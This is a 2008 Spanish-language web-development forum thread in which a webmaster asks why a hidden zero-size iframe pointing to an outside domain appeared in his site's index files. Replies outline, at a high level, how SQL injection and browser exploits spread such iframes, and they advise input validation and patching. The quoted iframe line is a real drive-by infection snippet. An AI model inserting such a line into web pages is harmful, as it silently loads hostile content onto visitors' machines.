Comunidad de diseño web y desarrollo en internet online

Me habrán hackeado mis archivos index.html index.php?

Citar            
MensajeEscrito el 03 May 2008 01:44 pm
Hola a todos nada más aquí queriendoles consultar al respecto.

Fijense que hace poco estuve revisando mi servidor y puesto que manejo un archivo index.html para ponerlo con el mensaje de \'en mantenimiento\' para cuando actualizo mi wordpress, pues me di cuenta al bajarlo y querer modificar el código, que de alguna manera se había insertado el código:

Código :

<iframe border=\"0\" frameborder=\"no\" src=\"http://nudeteens.in/4/index.php\" width=\"0\" height=\"0\"></iframe>


Luego revise por las dudas el archivo index.php (de wordpress) instalado en la raíz de mi sitio y tambien aparecía ese código. :? Que yo recuerde, no he hecho esos cambios y no entiendo como pudo insertarse ese código en mis archivos index. Mis archivos por lo general tienen 644 en los permisos CHMOD pero en vista de esa situación ahora los he cambiado (al menos los indexes) a 444.

Me podrían regalar su opinión al respecto de lo que pudo haber pasado, si les ha pasado algo similar a ustedes, y si me podrían dar algunos concejos de seguridad en mi servidor, y desde ya se los agradeceré.

Por abcmario

10 de clabLevel



Genero:Masculino  

El Salvador

firefox
Citar            
MensajeEscrito el 03 May 2008 01:58 pm

Por solisarg

BOFH

13669 de clabLevel

4 tutoriales
5 articulos

Genero:Masculino   Bastard Operators From Hell Premio_Secretos

Argentina

firefox
Citar            
MensajeEscrito el 03 May 2008 02:34 pm
Esa nota está muy bien, aunque me parece un tanto ambigua pero sirve mucho, ahora sé que es un ataque por medio de iframe. Muchas gracias por el comentario solisarg, pero me he quedado con la duda, acaso establecer el permisos a 444 no ayuda??

Por abcmario

10 de clabLevel



Genero:Masculino  

El Salvador

firefox
Citar            
MensajeEscrito el 03 May 2008 03:58 pm
Se trata de ganar derechos buscando scripts que pertenezcan al grupo ... léete las notas, ojalá fuera tan fácil como solo setear derechos de escritura

Jorge

Por solisarg

BOFH

13669 de clabLevel

4 tutoriales
5 articulos

Genero:Masculino   Bastard Operators From Hell Premio_Secretos

Argentina

firefox
Citar            
MensajeEscrito el 03 May 2008 08:43 pm
Esto...
¿Podría preguntar cómo se realizan esos ataques?
¿Cómo consiguen embeber un código, el que sea, en una página, sin tener acceso al user/password?
Es que mis conocimientos de inglés... no me dan para entender muy bien la referencia propuesta...
¿Sabrías explicarlo, aunque fuera "por encima"?
:oops:

Gracias... y perdona por intentar aprovecharme de los conocimientos que te supongo.
U_U

Por El Oso Amoroso

Claber

1780 de clabLevel

6 tutoriales

 

Madrid, España, Europa, Eurasia, La Tierra, Sist.Solar, Vía Láctea, UNIVERSO

firefox
Citar            
MensajeEscrito el 03 May 2008 09:03 pm
Bueno, supones demasiado, pero brevemente la historia es así. Primero: buscas sitios donde puedas ejecutar un ataque de SQL Injection (no el obvio de borrar entradas o cosas gruesas como esas) sino de meter JavaScript para ejecutar un script remoto (hay cadenas específicas en los buscadores que te dan pistas de sitios atacables). Luego ese script ataca el browser o sistema operativo casi siempre por desbordamiento de buffer para ejecutar código directamente en lo que cargas, apareciendo los iframes. Luego con un poco más de paciencia, desde una máquina infectada vas agregando tu cadena a todo lo que el usuario toca, si eres webmaster, touché

Jorge

Por solisarg

BOFH

13669 de clabLevel

4 tutoriales
5 articulos

Genero:Masculino   Bastard Operators From Hell Premio_Secretos

Argentina

firefox
Citar            
MensajeEscrito el 04 May 2008 11:05 am
Con lo que te "supuse", se vió suficiente.
Gracias por la explicación.
Al parecer... el problema es el de siempre:
no validar correctamente los datos que se reciben de los formularios de nuestra web
¿verdad?

Por El Oso Amoroso

Claber

1780 de clabLevel

6 tutoriales

 

Madrid, España, Europa, Eurasia, La Tierra, Sist.Solar, Vía Láctea, UNIVERSO

firefox
Citar            
MensajeEscrito el 04 May 2008 09:10 pm
Pues creo que no acabo de entender, pero me da la impresión de que la máquina de abcmario esta infectada con algún tipo de virus que agrega iframes a las páginas que edita, y que se contagió precisamente por alguno de estos iframe. ¿Es así?

Por Odin

Claber

639 de clabLevel

2 tutoriales

Genero:Masculino   Premio_Secretos

El valle de las hamacas

firefox
Citar            
MensajeEscrito el 04 May 2008 11:53 pm
Sip, siempre se trata de validar bien los datos, que es la puerta de entrada. Puede que el navegador esté infectado, pero el ataque tiene muchas variantes. Yo mismo en el sitio que dirijo tuve la misma infección un par de veces. En cualquier caso, si se usan sistemas ampliamente conocidos (por ejemplo phpbb o cualquier sistema popular de blog) hay que estar al loro de las actualizaciones de seguridad, porque cada tanto alguien encuentra el agujero (SIEMPRE hay un agujero, es como el juego del gato y el ratón) y hay que correr a tapar

Jorge

Por solisarg

BOFH

13669 de clabLevel

4 tutoriales
5 articulos

Genero:Masculino   Bastard Operators From Hell Premio_Secretos

Argentina

firefox

 

Cristalab BabyBlue v4 + V4 © 2011 Cristalab
Powered by ClabEngines v4, HTML5, love and ponies.